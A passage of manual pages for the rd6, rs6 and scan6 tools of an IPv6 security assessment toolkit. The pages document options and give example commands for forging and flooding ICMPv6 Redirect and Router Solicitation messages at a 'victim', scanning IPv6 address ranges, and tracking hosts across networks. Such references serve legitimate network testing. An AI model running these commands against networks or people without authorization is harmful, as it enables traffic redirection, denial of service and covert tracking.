specified by means of multiple "\-u" options. .TP .BI \-U\ HDR_SIZE ,\ \-\-dst\-opt\-u\-hdr\ HDR_SIZE This option specifies a Destination Options header to be included in the "unfragmentable part" of the resulting packet. The header size must be specified as an argument to this option (the header is filled with padding options). Multiple Destination Options headers may be specified by means of multiple "\-U" options. This option is only valid if the "\-y" option is specified (as the concept of "unfragmentable part" only makes sense when fragmentation is employed). .TP .BI \-H\ HDR_SIZE ,\ \-\-hbh\-opt\-hdr\ HDR_SIZE This option specifies that a Hop-by-Hop Options header is to be included in the resulting packet. The header size must be specified as an argument to this option (the header is filled with padding options). Multiple Hop\-by\-Hop Options headers may be specified by means of multiple "\-H" options. .TP .BI \-S\ SRC_LINK_ADDR ,\ \-\-src\-link\-address\ SRC_LINK_ADDR This option specifies the link\-layer Source Address of the Redirect messages (this option is only valid for Ethernet interfaces). If left unspecified, the link\-layer Source Address is randomized. However, if this option is left unspecified, but the "\-\-learn\-router" option is set, the link\-layer Source Address is set to that of the default router for the local network. .TP .BI \-D\ DST_LINK_ADDR ,\ \-\-dst\-link\-address\ DST_LINK_ADDR This option specifies the link\-layer Destination Address of the Redirect messages (this option is only valid for Ethernet interfaces). If left unspecified, it is set to the "all-nodes link-local multicast" address (ff02::1). When operating in passive mode, the link\-layer Destination Address is set according to the link\-layer Source Address of the incoming packet. .TP \-\-redir\-target, \-t This option specifies the Target Address of the Redirect messages. If the "\-T" ("\-\-flood\-targets") option is specified, this option specifies an IPv6 prefix in the form "\-t prefix/prefixlen". See the description of the "\-T" option for further information on how the "\-t" option is processed in that specific case. This option can be left unspecified only if the "\-\-make\-onlink" option is selected, in which case the Redirect Target Address is set to the same value as the Redirect Destination address. .TP \-\-redir\-dest, \-r This option specifies the Redirect Destination Address. If the "\-R" ("\-\-flood\-dests") option is specified, this option specifies an IPv6 prefix in the form "\-r prefix/prefixlen". See the description of the "\-R" option for further information on how the "\-t" option is processed in that specific case. .TP \-\-payload\-type, \-p This option specifies the payload type to be included in the Redirect Payload. Currently supported payloads are "TCP", "UDP", and "ICMP6". The payload-type defaults to "TCP". .TP \-\-payload\-size, \-P Size of the payload to be included in the Redirect message (with the payload type being specified by the "\-p" option). By default, as many bytes as possible are included, without exceeding the minimum IPv6 MTU (1280 bytes). .TP \-\-no\-payload, \-n This option specifies that no payload (i-e-, no Redirected Header option) should be included in the Redirect message. .TP \-\-ipv6\-hlim, \-c This option specifies the Hop Limit of the IPv6 packet included in the payload of the Redirect message. It defaults to 255. .TP \-\-peer\-addr, \-x This option specifies the IPv6 Source Address of the Redirect payload. If left unspecified, the IPv6 Source Address of the Redirect payload is set to the same value as the IPv6 Destination Address of the packet. This option is only employed for packets sent in "active" mode. Note: this option might be useful to check whether an implementation validates the contents of the Redirect message. .TP \-\-redir\-port, \-o This option specifies the Destination Port of the TCP or UDP packet contained in the Redirect payload. Note: This option is meaningful only if "TCP" or "UDP" have been specified with the "\-p" option. .TP \-\-peer\-port, \-a This option specifies the Source Port of the TCP or UDP packet contained in the Redirect payload. Note: This option is meaningful only if "TCP" or "UDP" have been specified with the "\-p" option. .TP \-\-tcp\-flags, \-X This option specifies the flags of the TCP header contained in the Redirect payload. The flags are specified as "F" (FIN), "S" (SYN), "R" (RST), "P" (PSH), "A" (ACK), "U" (URG), "X" (no flags). If left uspecified, only the "ACK" bit is set. Note: This option is meaningful only if "TCP" has been specified with the "\-p" option. .TP \-\-tcp\-seq, \-q This option specifies the Sequence Number of the TCP header contained in the Redirect payload. If left unspecified, the Sequence Number is randomized. Note: This option is meaningful only if "TCP" has been specified with the "\-p" option. .TP \-\-tcp\-ack, \-Q This option specifies the Acknowledgment Number of the TCP header contained in the Redirect payload. If left unspecified, the Acknowledgment Number is randomized. Note: This option is meaningful only if "TCP" has been specified with the "\-p" option. .TP \-\-tcp\-urg, \-V This option specifies the Urgent Pointer of the TCP header contained in the Redirect payload. If left unspecified, the Urgent Pointer is set to 0. Note: This option is meaningful only if "TCP" has been specified with the "\-p" option. .TP \-\-tcp\-win, \-w This option specifies the Window of the TCP header contained in the Redirect payload. If left unspecified, the Window is randomized. Note: This option is meaningful only if "TCP" has been specified with the "\-p" option. .TP \-\-resp\-mcast, \-M This option specifies that, when operating in "passive" mode, the tool should also respond to packets sent to multicast addresses. By default, the tool does not send Redirects in response to packets sent to multicast addresses. .TP \-\-make\-onlink, \-O This option instructs the tool to set the Redirect Target Address to the same value as the Redirect Destination Address, thus causing the specified address to be considered "on-link". .TP \-\-learn\-router, \-N This option instructs the tool to learn the link\-layer and the (link-local) IPv6 addresses of the local router by means of Router Solicitation and Router Advertisement messages. If the IPv6 Source Address or the link\-layer Source Address are left unspecified, the corresponding values learned with this option will be used. Note: This option is very useful to avoid having to manually enter the IPv6 and/or Ethernet addresses of the router. .TP \-\-target\-lla\-opt, \-E This option specifies the contents of a target link\-layer address option to be included in the Redirect messages. If a single option is specified, it is included in all the outgoing Redirect messages. If more than one target link\-layer address is specified (by means of multiple "\-E" options), and all the resulting options cannot be conveyed into a single Redirect message, multiple Redirect messages will be sent as needed. .TP \-\-add\-tlla\-opt, \-e This option instructs the rd6 tool to include a target link\-layer address option in the Redirect messages that it sends. When this option is employed, the link\-layer Source Address must be specified, and such value will be used for the target link\-layer address option. The difference between this option and the "\-E" option is that the "\-e" option does not specify the actual value of the option, but just instructs the tool to include a target link\-layer address option (the actual value of the option is selected as explained before). .TP .BI \-j\ SRC_ADDR ,\ \-\-block\-src\ SRC_ADDR This option sets a block filter for the incoming packets, based on their IPv6 Source Address. It allows the specification of an IPv6 prefix in the form "\-j prefix/prefixlen". If the prefix length is not specified, a prefix length of "/128" is selected (i.e., the option assumes that a single IPv6 address, rather than an IPv6 prefix, has been specified). .TP .BI \-k\ DST_ADDR ,\ \-\-block\-dst\ DST_ADDR This option sets a block filter for the incoming Neighbor Solicitation messages, based on their IPv6 Destination Address. It allows the specification of an IPv6 prefix in the form "\-k prefix/prefixlen". If the prefix length is not specified, a prefix length of "/128" is selected (i.e., the option assumes that a single IPv6 address, rather than an IPv6 prefix, has been specified). .TP .BI \-J\ SRC_ADDR ,\ \-\-block\-link\-src\ SRC_ADDR This option sets a block filter for the incoming packets, based on their link\-layer Source Address. The option must be followed by a link\-layer address (this option is only valid for Ethernet interfaces). .TP .BI \-K\ DST_ADDR ,\ \-\-block\-link\-dst\ DST_ADDR This option sets a block filter for the incoming packets, based on their link\-layer Destination Address. The option must be followed by a link\-layer address (this option is only valid for Ethernet interfaces). .TP .BI \-b\ SRC_ADDR ,\ \-\-accept\-src\ SRC_ADDR This option sets an accept filter for the incoming packets, based on their IPv6 Source Address. It allows the specification of an IPv6 prefix in the form "\-b prefix/prefixlen". If the prefix length is not specified, a prefix length of "/128" is selected (i.e., the option assumes that a single IPv6 address, rather than an IPv6 prefix, has been specified). .TP .BI \-g\ DST_ADDR ,\ \-\-accept\-dst\ DST_ADDR This option sets a accept filter for the incoming packets, based on their IPv6 Destination Address. It allows the specification of an IPv6 prefix in the form "\-g prefix/prefixlen". If the prefix length is not specified, a prefix length of "/128" is selected (i.e., the option assumes that a single IPv6 address, rather than an IPv6 prefix, has been specified). .TP .BI \-B\ SRC_ADDR ,\ \-\-accept\-link\-src\ SRC_ADDR This option sets an accept filter for the incoming Neighbor Solicitation messages, based on their link\-layer Source Address. The option must be followed by a link\-layer address (this option is only valid for Ethernet interfaces). .TP .BI \-G\ DST_ADDR ,\ \-\-accept\-link\-dst\ DST_ADDR This option sets an accept filter for the incoming packets, based on their link\-layer Destination Address. The option must be followed by a link\-layer address (this option is only valid for Ethernet interfaces). .TP \-\-sanity\-filters, \-w This option automatically adds an "accept filter" for the link\-layer Destination Address corresponding to the local router (either learned as a result of the "\-\-learn\-router" option, or specified by the "\-S" option), and a block filter for the IPv6 Source Address fe80::/16. Note: This option is desirable in virtually all scenarios, such that the tool does not respond to link-local traffic, etc. .TP \-\-flood\-dests, \-R This option instructs the rd6 tool to send multiple Redirect messages for different Redirect Destination Addresses. The number of different Redirect Destination Addresses is specified as "\-R number". The Redirect Destination Address of each packet is randomly selected from the prefix ::/0, unless a different prefix has been specified by means of the "\-r" option. .TP \-\-flood\-targets, \-T This option instructs the rd6 tool to send multiple Redirect messages for different Redirect Target Addresses. The number of different Target Addresses is specified as "\-T number". The Target Address of each packet is randomly selected from the prefix fe80::/64, unless a different prefix has been specified by means of the "\-t" option. .TP \-\-flood\-sources, \-F This option instructs the tool to send multiple Redirect messages with different Source Addresses. The number of different sources is specified as "\-F number". The Source Address of each Redirect message is randomly selected from the prefix specified by the "\-s" option. If the "\-F" option is specified but the "\-s" option is left unspecified, the Source Address of the packets is randomly selected from the prefix fe80::/64 (link-local unicast). It should be noted that hosts are required to discard Redirect messages whose IPv6 Source address does not match the (link-local) IPv6 address of the router used for the Redirect Destination Address. .TP \-\-loop, \-l This option instructs the rd6 tool to send periodic Redirect messages to the victim node. The amount of time to pause between sending Redirect messages can be specified by means of the "\-z" option, and defaults to 1 second. Note that this option cannot be set in conjunction with the "\-L" ("\-\-listen") option. .TP \-\-sleep, \-z This option specifies the amount of time to pause between sending Redirect messages (when the "\-\-loop" option is set). If left unspecified, it defaults to 1 second. .TP \-\-listen, \-L This instructs the rd6 tool to operate in passive mode (possibly after attacking a given node). Note that this option cannot be used in conjunction with the "\-l" ("\-\-loop") option. .TP \-\-verbose, \-v This option instructs the rd6 tool to be verbose. When the option is set twice, the tool is "very verbose", and the tool also informs which packets have been accepted or discarded as a result of applying the specified filters. .TP \-\-help, \-h Print help information for the rd6 tool. .SH EXAMPLES The following sections illustrate typical use cases of the .B rd6 tool. \fBExample #1\fR # rd6 \-i eth0 \-\-learn\-router \-\-sanity\-filters \-L \-\-make\-onlink \-v The tool uses the network interface "eth0", and operates in passive mode ("\-L" option). The IPv6 and Ethernet address of the local router is automatically learned by means of RS/RA messages. Basic filters are employed to avoid responding to incorrect/unnecessary packets ("\-\-sanity\-filters"). Each Redirect message will contain the Redirect Target Address set to the same value as the Redirect Destination Address, thus causing the corresponding address to be considered "on-link" ("\-\-make\-onlink" option). The tool will print detailed information about the attack ("\-v" option). \fBExample #2\fR # rd6 \-i eth0 \-\-learn\-router \-d 2001:db8::1 \-r 2001:db8::/64 \-t fe80::bad \-R 100 \-l \-v Flood the victim host (specified with the "\-d" option) with batches of 100 Redirect messages ("\-R 100" option). Each Redirect message redirects a random address from the prefix "2001:db8::/64" to the address "fe80::bad". The IPv6 and link\-layer addresses of the current local router is dynamically learned by means of RS/RA messages ("\-\-learn\-router" option). The process is repeated every second ("\-l" option, with the default delay of 1 second). .SH SEE ALSO "Security/Robustness Assessment of IPv6 Neighbor Discovery Implementations" (available at: ) for a discussion of Neighbor Discovery vulnerabilities, and additional examples of how to use the na6 tool to exploit them. .SH AUTHOR The .B rd6 tool and the corresponding manual pages were produced by Fernando Gont .I for SI6 Networks .IR . .SH COPYRIGHT Copyright (c) 2011\-2013 Fernando Gont. Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation License, Version 1.3 or any later version published by the Free Software Foundation; with no Invariant Sections, no Front\-Cover Texts, and no Back\-Cover Texts. A copy of the license is available at .IR . ipv6toolkit-1.5.1/manuals/rs6.1000066400000000000000000000216571223702747200162650ustar00rootroot00000000000000.TH RS6 1 .SH NAME rs6 \- A security assessment tool for attack vectors based on ICMPv6 Router Solicitation messages .SH SYNOPSIS .B rs6 .RB [\| \-i .IR INTERFACE\| ] [\-s SRC_ADDR[/LEN]] [\-d DST_ADDR] [\-y FRAG_SIZE] [\-u DST_OPT_HDR_SIZE] [\-U DST_OPT_U_HDR_SIZE] [\-H HBH_OPT_HDR_SIZE] [\-S LINK_SRC_ADDR] [\-D LINK-DST-ADDR] [\-E LINK_ADDR] [\-e] [\-F N_SOURCES] [\-z SECONDS] [\-l] [\-v] [\-h] .SH DESCRIPTION .B rs6 allows the assessment of IPv6 implementations with respect to a variety of attacks based on ICMPv6 Router Solicitation messages. This tool is part of the SI6 Networks' IPv6 Toolkit: a security assessment suite for the IPv6 protocols. .SH OPTIONS .B rs6 takes its parameters as command-line options. Each of the options can be specified with a short name (one character preceded with the hyphen character, as e.g. "\-i") or with a long name (a string preceded with two hyphen characters, as e.g. "\-\-interface"). Depending on the amount of information (i.e., options and option data) to be conveyed into the Router Solicitations, it may be necessary for rs6 to split that information into more than one Router Solicitation. Also, when the rs6 tool is instructed to flood the victim with Router Solicitations from different sources ("\-\-flood\-sources" option), multiple packets may need to be generated. rs6 supports IPv6 fragmentation, which may be of use if a large amount of information needs to be conveyed within a single Router Solicitation message. IPv6 fragmentation is not enabled by default, and must be explicitly enabled with the "\-y" option. .TP .BI \-i\ INTERFACE ,\ \-\-interface\ INTERFACE This option specifies the network interface that the tool will use. If the destination address ("\-d" option) is a link-local address, the interface must be explicitly specified. The interface may also be specified along with a destination address, with the "\-d" option. .TP .BI \-s\ SRC_ADDR ,\ \-\-src\-address\ SRC_ADDR This option is meant to specify the IPv6 Source Address (or IPv6 prefix) to be used for the Router Solicitation messages. If left unspecified, a randomized link-local unicast (fe80::/64) address is selected. .TP .BI \-d\ DST_ADDR ,\ \-\-dst\-address\ DST_ADDR This option specifies the IPv6 Destination Address of the Router Solicitation messages. If left unspecified, but the Ethernet Destination Address is specified, the "all-routers link-local multicast" address (ff02::2) is selected as the IPv6 Destination Address. .TP \-\-hop\-limit, \-A This option specifies the IPv6 Hop Limit to be used for the Router Solicitation messages. It defaults to 255. Note that IPv6 nodes are required to check that the Hop Limit of incoming Router Solicitation messages is 255. Therefore, this option is only useful to assess whether an IPv6 implementation fails to enforce the aforementioned check. .TP .BI \-y\ SIZE ,\ \-\-frag\-hdr\ SIZE This option specifies that the resulting packet must be fragmented. The fragment size must be specified as an argument to this option. .TP .BI \-u\ HDR_SIZE ,\ \-\-dst\-opt\-hdr\ HDR_SIZE This option specifies that a Destination Options header is to be included in the resulting packet. The extension header size must be specified as an argument to this option (the header is filled with padding options). Multiple Destination Options headers may be specified by means of multiple "\-u" options. .TP .BI \-U\ HDR_SIZE ,\ \-\-dst\-opt\-u\-hdr\ HDR_SIZE This option specifies a Destination Options header to be included in the "unfragmentable part" of the resulting packet. The header size must be specified as an argument to this option (the header is filled with padding options). Multiple Destination Options headers may be specified by means of multiple "\-U" options. This option is only valid if the "\-y" option is specified (as the concept of "unfragmentable part" only makes sense when fragmentation is employed). .TP .BI \-H\ HDR_SIZE ,\ \-\-hbh\-opt\-hdr\ HDR_SIZE This option specifies that a Hop-by-Hop Options header is to be included in the resulting packet. The header size must be specified as an argument to this option (the header is filled with padding options). Multiple Hop\-by\-Hop Options headers may be specified by means of multiple "\-H" options. .TP .BI \-S\ SRC_LINK_ADDR ,\ \-\-src\-link\-address\ SRC_LINK_ADDR This option specifies the link-layer Source Address of the Router Solicitation messages (currently, only Ethernet is supported). If left unspecified, the link-layer Source Address is randomized. .TP .BI \-D\ DST_LINK_ADDR ,\ \-\-dst\-link\-address\ DST_LINK_ADDR This option specifies the link-layer Destination Address of the Router Solicitation messages (currently, only Ethernet is supported). If left unspecified, the link-layer Destination Address is set to "33:33:00:00:00:02" (the Ethernet address that corresponds to the "all-routers link-local multicast" address). .TP \-\-source\-lla\-opt, \-E This option specifies the contents of a source link-layer address option to be included in the Router Solicitation messages. If more than one source link-layer address is specified (by means of multiple "\-E" options), and all the resulting options cannot be conveyed into a single Router Solicitation, multiple Router Solicitations will be sent as needed. .TP \-\-add\-slla\-opt, \-e This option instructs the rs6 tool to include a source link-layer address option in the Router Solicitation messages that it sends. The link-layer address included in the option is the same as the Ethernet Source Address used for the outgoing Router Solicitation messages. .TP \-\-flood\-sources, \-F This option instructs the rs6 tool to send Router Solicitations from multiple (and random) IPv6 Source Addresses. The number of different sources is specified as "\-F number". The IPv6 Source Address of each Router Solicitation is a randomized from the IPv6 prefix specified with the "\-s" option, and defaults to a random link-local unicast address (fe80::/64). .TP \-\-loop, \-l This option instructs the rs6 tool to send periodic Router Solicitations to the destination node. The amount of time to pause between sending Neighbor Solicitations can be specified by means of the "\-z" option, and defaults to 1 second. .TP \-\-sleep, \-z This option instructs the rs6 tool to the amount of time to pause between sending Router Solicitation messages. If left unspecified, it defaults to 1 second. .TP \-\-verbose, \-v This option instructs the rs6 tool to be verbose. .TP \-\-help, \-h Print help information for the rs6 tool. .SH EXAMPLES The following sections illustrate typical use cases of the .B rs6 tool. \fBExample #1\fR # rs6 \-i eth0 \-e Use the network interface "eth0" to send a Router Solicitation using a random link-local unicast IPv6 Source Address and a random Ethernet Source Address, to the IPv6 Destination Address "ff02::2" ("all-routers link-local multicast" address, selected by default) and the Ethernet Destination Address "33:33:00:00:00:02" (selected by default). The Router Solicitation also includes a source link-layer address option, that contains the same Ethernet address as that used for the Ethernet Source Address of the packet. \fBExample #2\fR # rs6 \-i eth0 \-e \-F 100 \-l \-z 10 \-v Send 100 Router Solicitation messages using a random Ethernet Source Address and random IPv6 Source Address for each of them, to the Ethernet Destination Address "33:33:00:00:00:02" (default) and the IPv6 Destination Address "ff02:2" (default). Each message includes a source link-layer address option that contains the same link-layer address as that used for the Ethernet Source Address of the packet. Repeat this operation every ten seconds. Be verbose. \fBExample #3\fR # rs6 \-i eth0 \-d fe80::1 \-E ff:ff:ff:ff:ff:ff \-v Send one Router Solicitation message using a random Ethernet Source Address and a random link-local unicast (i.e., fe80::/64) IPv6 Source Address, to the Ethernet Destination Address "33:33:00:00:00:02" (default) and the IPv6 Destination Address "fe80::1". Each Router Solicitation includes a source link-layer address option that contains the Ethernet address "ff:ff:ff:ff:ff:ff". Be verbose. .SH SEE ALSO "Security/Robustness Assessment of IPv6 Neighbor Discovery Implementations" (available at: ) for a discussion of Neighbor Discovery vulnerabilities, and additional examples of how to use the na6 tool to exploit them. .SH AUTHOR The .B rs6 tool and the corresponding manual pages were produced by Fernando Gont .I for SI6 Networks .IR . .SH COPYRIGHT Copyright (c) 2011\-2013 Fernando Gont. Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation License, Version 1.3 or any later version published by the Free Software Foundation; with no Invariant Sections, no Front\-Cover Texts, and no Back\-Cover Texts. A copy of the license is available at .IR . ipv6toolkit-1.5.1/manuals/scan6.1000066400000000000000000000605271223702747200165640ustar00rootroot00000000000000.TH SCAN6 1 .SH NAME scan6 \- An IPv6 host scanner .SH SYNOPSIS .B scan6 .RB [\| \-i .IR INTERFACE \|] .RB [\| \-s .IR SRC_ADDR \|[/\| LEN \|]] .RB [\| \-d .IR DST_ADDR \|[/\| LEN\| .RB | \ \-L \|] .RB [\| \-r \|] .RB [\| \-S .IR LINK_SRC_ADDR | \-R\|] .RB [\| \-p .IR PROBE_TYPE \|] .RB [\| \-P .IR PAYLOAD_SIZE \|] .RB [\| \-o .IR SRC_PORT \|] .RB [\| \-a .IR DST_PORT \|] .RB [\| \-X .IR TCP_FLAGS \|] .RB [\| \-P .IR ADDRESS_TYPE \|] .RB [\| \-e \|] .RB [\| \-x .IR RETRANS \|] .RB [\| \-o \| .IR TIMEOUT \|] .RB [\| \-V .IR VM_TYPE \|] .RB [\| \-b \|] .RB [\| \-B .IR IPV4_ENCODING \|] .RB [\| \-k .IR IEEE_OUI \|] .RB [\| \-K .IR VENDOR \|] .RB [\| \-m .IR PREFIXES_FILE \|] .RB [\| \-w .IR IIDS_FILE \|] .RB [\| \-W .IR IID \|] .RB [\| \-T \|] .RB [\| \-Q .IR PREFIX/LEN \|] .RB [\| \-I .IR INC_SIZE \|] .RB [\| \-c .IR CONFIG_FILE \|] .RB [\| \-r \|] .RB [\| \-l \|] .RB [\| \-z .IR SECONDS \|] .RB [\| \-R \|] .RB [\| \-v \|] .RB [\| \-h \|] .SH DESCRIPTION .B scan6 is an IPv6 address scanning tool that implements a number of advanced IPv6 address scanning techniques. It is part of the SI6 Networks' IPv6 Toolkit v1.3.4: a security assessment suite for the IPv6 protocols. \fBHOST SCANNING TECHNIQUES\fR .B scan6 employs a number of techniques to discover active IPv6 nodes. The following subsections discuss the different techniques employed for each type of IPv6 scan. \fBLocal scans\fR For local scans, .B scan6 operates (roughly) as follows: .sp .RS 4 .nf \+ The tool learns the local prefixes used for auto\-configuration, \ and generates one address for each local prefix (in addition to \ a link\-local address) \+ An ICMPv6 Echo Request message destined to the all-nodes on-link \ multicast address (ff02::1) is sent with each of the addresses \ "configured" in the previous step. Probe packets are sent with \ different Source Addresses, such that they elicit responses from \ different addresses (as a result of the default IPv6 Source \ Address selection policy). Hence. all (or most) addresses of \ each node can be discovered. \+ The same procedure of the previous bullet is performed, but \ this time with ICMPv6 packets that contain an unrecognized \ option of type 10xxxxxx, such that ICMPv6 Parameter Problem \ error messages are elicited. This allows the tool to discover \ e.g. Windows nodes, which otherwise do not respond to multicasted \ ICMPv6 Echo Request messages. \+ Each time a new "alive" address is discovered, the corresponding \ Interface-ID is combined with all the local prefixes, and the \ resulting addresses are probed (with unicasted packets). This \ can help to discover all the SLAAC\-derived and the "private \ addresses", since some responses might contain e.g. Modified \ EUI-64 Format Identifiers, which are likely used with all the \ available prefixes. \+ Finally, the tool removes any duplicate addresses, such that each \ unique address is informed to the user only once. .fi .RE The aforementioned scheme can fail to discover some addresses for some implementation. For example, MacOS X employs IPv6 addresses embedding IEEE-identifiers when responding to packets destined to a link\-local multicast address (and hence the temporary addresses could not be learned). \fBRemote scans\fR scan6 employs a number of bran-new techniques for performing address scans of remote networks. Namely, it tries to mitigate a number of patterns in IPv6 addresses, such that the (theoretical) search space of 2**64 addresses is dramatically reduced. scan6 can leverage the following address patterns: .sp .RS 4 .nf \+ SLAAC addresses of specific vendors: Addresses that embedd the MAC \ address of the corresponding network interface card. \+ virtual host addresses: Most virtualization technologies select \ their MAC addresses from specific IEEE OUIs (e.g., VirtualBox \ employs the OUI 00:50:56) \+ "low-byte" addresses: in which only the lowest order (or the two \ lowest order) word of the IID contains a small integer (with the \ rest of the words being set to zero) \+ IPv4\-based addresses: in which the IID encodes the IPv4\-address \ of the network interface (as in 2001:db8::192.168.1.1 or \ 2001:db8::192:168:1:1) .fi .RE A thorough discussion of these address patterns can be found in: . \fBHOST TRACKING\fR .B scan6 can be employed to track IPv6 nodes across networks. Since IPv6 StateLess Address Auto-Configuration (SLAAC) typically results in globally-unique Interface Identifiers (IIDs) that are constant across networks, such identifiers can be leveraged to track nodes across a range of "known" networks, by periodically probing the IPv6 address composed of the IPv6 prefix of the target network, and the (known) Interface ID of the target node. For host-tracking purposes, the target networks can be specified with the '\-d' and/or '\-m' options, while the target Interface IDs can be specified with the '\-w' and/or the '\-W' options (see the documentation of each option for further information). Since for tracking purposes one will continually track the user across networks, the '\-l' option will typically be set. Additionally, the '\-z' option may be used to specify the number of seconds to sleep between iterations (i.e. each round of probes send to the specified targets). The value specified by the '\-z' option represents a trade-off between time-liness of the tracking and bandwidth-consumption. IPv6 host-tracking is discussed in detail in Appendix A of . .SH OPTIONS .B scan6 takes its parameters as command-line options. Each of the options can be specified with a short name (one character preceded with the hyphen character, as e.g. "\-i") or with a long name (a string preceded with two hyphen characters, as e.g. "\-\-interface"). .TP .BI \-i\ interface ,\ \-\-interface\ interface This option specifies the network interface to be used by the .B scan6 tool, and is mandatory when performing local address scans (\-L option). .TP .BI \-s\ SRC_ADDR ,\ \-\-src\-address\ SRC_ADDR This option specifies the IPv6 Source Address to be used for the Source Address of the probe packets. If a prefix is specified, the Source Address is randomly selected from that prefix. If this option is left unspecified, the addresses currently configured for the specified network interface card are used. .TP .BI \-d\ DST_ADDRESS ,\ \-\-dst\-address\ DST_ADDRESS This option specifies the target address prefix/range of the address scan. An IPv6 prefix can be specified in the form 2001:db8::/64, or as 2001:db8:a-b:1\-10 (where specific address ranges are specified for the two low order 16\-bit words). This option must be specified for remote address scanning attacks. .TP .BI \-S\ SRC_LINK_ADDR ,\ \-\-link\-src\-address\ SRC_LINK_ADDR This option specifies the link\-layer Source Address of the probe packets (currently, only Ethernet is supported). If left unspecified, the real link\-layer address of the interface is used. Note: Some systems may discard packets when the link\-layer address is forged. That is, even when the relevant function calls (and hence the scan6 tool itself) may return "success", packets may be discarded and not actually sent on the specified network link. In such scenarios, the real Ethernet address should be used. This type of behaviour has been found in some Linux systems. .TP .BI \-p\ PROBE_TYPE ,\ \-\-probe\-type\ PROBE_TYPE This option specifies the probe packets to be used for address scanning. For local-network address scans, possible arguments are: "echo" (for ICMPv6 Echo Request), "unrec" (for IPv6 packets with unrecognized IPv6 options of type 10xxxxxx), and "all" (for using both ICMPv6 Echo Requests probes and unrecognized options of type 10xxxxxx). If left unspecified, this option defaults to "all". For remote-network address scans, possible arguments are: "echo" (for ICMPv6 Echo Request), "unrec" (for IPv6 packets with unrecognized IPv6 options of type 10xxxxxx), and "tcp" (for using TC segments). For remote-network scans, this option defaults to "echo" (if left unspecified). Note: For local-network address scans, using unrecognized IPv6 options of type 10xxxxxx enables the discovery of Windows Vista and Windows 7 systems, which otherwise do not respond to ICMPv6 Echo Requests sent to multicast addresses. .TP .BI \-P\ PAYLOAD_SIZE ,\ \-\-payload\-size\ PAYLOAD_SIZE This option specifies the payload size of the probe packet. It defaults to 0 for TCP (i.e., empty TCP segments), and to 56 for ICMPv6. .TP .BI \-o\ SRC_PORT ,\ \-\-src\-port\ SRC_PORT This option specifies the TCP/UDP Source Port. If left unspecified, the Source Port is randomized from the range 1024\-65535. .TP .BI \-a\ DST_PORT ,\ \-\-dst\-port\ DST_PORT This option specifies the TCP/UDP Destination Port. If left unspecified, the Destination Port is randomized from the range 1\-1024. .TP .BI \-X\ TCP_FLAGS ,\ \-\-tcp\-flags\ TCP_FLAGS This option is used to set specific the TCP flags. The flags are specified as "F" (FIN), "S" (SYN), "R" (RST), "P" (PSH), "A" (ACK), "U" (URG), "X" (no flags). If this option is left unspecified, the ACK bit is set on all probe packets. .TP .BI \-P\ ADDR_TYPE ,\ \-\-print\-type\ ADDR_TYPE This option specifies the address types to be printed/informed by the .B scan6 tool. The possible arguments are: "local" (link\-local addresses), "global" (global addresses), and "all" (print both link\-local and global-addresses). If left unspecified, this option defaults to "all" (print both link\-local and global-addresses). .TP .BR \-q ,\ \-\-print\-unique This option specifies that for each address scope (local and/or global) only one IPv6 address per Ethernet address should be printed. This option can be useful when interest is in identifying unique systems (e.g. for counting the number of systems connected to the local network), rather than the number of configured addresses on the local network. Note: In the case of systems that implement "Privacy Extensions for SLAAC" (IETF RFC 4941), more than one global unicast address will typically be found by the scan6 tool. .TP .BR \-e\| ,\ \-\-print\-link\-addr This option specifies that the link\-layer addresses should be printed along with the IPv6 addresses, with the format "IPV6ADDRESS @ LINKADDRESS". .TP .BR \-t\| ,\ \-\-print\-timestamp This option specifies that a timestamp should be printed after the IPv6 address of each alive node. .TP .BI \-x\ NO_RETRANS ,\ \-\-retrans\ NO_RETRANS This option specifies the number of times probe packets should be retransmitted when no response is received. Note: If left unspecified, the number of retransmission defaults to 0 (i.e., no retransmissions). Note: this option might be useful when packets must traverse unreliable and/or congested network links. .TP .BI \-o\ TIMEOUT ,\ \-\-timeout\ TIMEOUT This option specifies the amount of time that the tool should wait for responses to probe packets. If left unspecified, the timeout value defaults to 1 second. Note: this option might be useful when scanning hosts on long-delay links. .TP .BR \-L ,\ \-\-local This option specifies that host scanning should be performed on the local subnet. The type of probe packets to be used can be specified with the "\-p" option. .TP .BR \-r\| ,\ \-\-rand\-src\-addr This option specifies that the IPv6 Source Address should be randomized. .TP .BR \-R\| ,\ \-\-rand\-link\-src\-addr This option specifies that the Ethernet Source Address should be randomized. .TP .BI \-V\ VM_TYPE ,\ \-\-tgt\-virtual\-machines\ VM_TYPE This option specifies that the target is virtual machines. Possible options are: 'vbox' (VirtualBox), 'vmware' (vmware), and 'all' (both VirtualBox and vmware). When this option is specified, scan6 can narrow dow the search space by targeting only those IEEE OUIs employed by the aforementioned virtualization software. Note: For vmware, the search space can be further reduced if the '\-\-ipv4\-host' option is specified. .TP .BR \-b\| ,\ \-\-tgt\-low\-byte This option specifies that the target is IPv6 nodes employing "low-byte" addresses. Low byte addresses are generated by concatenating the IPv6 prefix specified by the "\-d" option with an Interface I-D of the form "0:0:0\-100:0\-1500". .TP .BI \-B\ IPV4_ENCODING ,\ \-\-tgt\-ipv4\ IPV4_ENCODING This option specifies that the target is IPv6 addresses that embed an IPv4 address. Possible encondings are "ipv4-32" (where the IPv4 address is embedded in the low-order 32 bits of the IPv6 address), "ipv4-64" (where the IPv4 address is embedded in the low-order 64 bits of the IPv6 address), and "ipv4-all" (which is equivalent to setting both the "ipv4-32" and "ipv4-64" encodings). When this option is set, a prefix should be specified with the '\-\-ipv4\-host' option, such that the search space is reduced. Note: When an IPv4 address is encoded in 64 bits, each byte of the IPv4 address is firstly converted to a number that has the same representation in hexadecimal (e.g., 100 would be converted to 256, since the hexadecimal representation of 256 is 0x100) before that byte is embedded in a 16-bit word. For example, the IPv4 address 192.168.0.1 would result, when combined with the prefix 2001:db8::/32 in the IPv6 address 2001:db8::192:168:0:1 (note that while each byte of the original IPv4 address has the same representation within the IPv6 address, each value now stands for an hexadecimal number). .TP .BR \-g\| ,\ \-\-tgt\-port This option specifies that the target is IPv6 addresses that embed service ports (such as 2001:db8::25, 2001:db8::80, etc.). When this option is set addresses containing these ports will be probed: .sp .RS 4 .nf 21 (ftp) 22 (ssh) 23 (telnet) 25 (smtp) 49 (tacacs) 53 (dns) 80 (www) 110 (pop3) 123 (ntp) 179 (bgp) 220 (imap3) 389 (ldap) 443 (https) 547 (dhcpv6\-server) 993 (imaps) 995 (pop3s) 1194 (openvpn) 3306 (mysql) 5060 (sip) 5061 (sip-tls) 5432 (postgresql) 6446 (mysql-proxy) 8080 (http-alt) .fi .RE Note: The target IPv6 addresses are generated by concatenating the service port to an 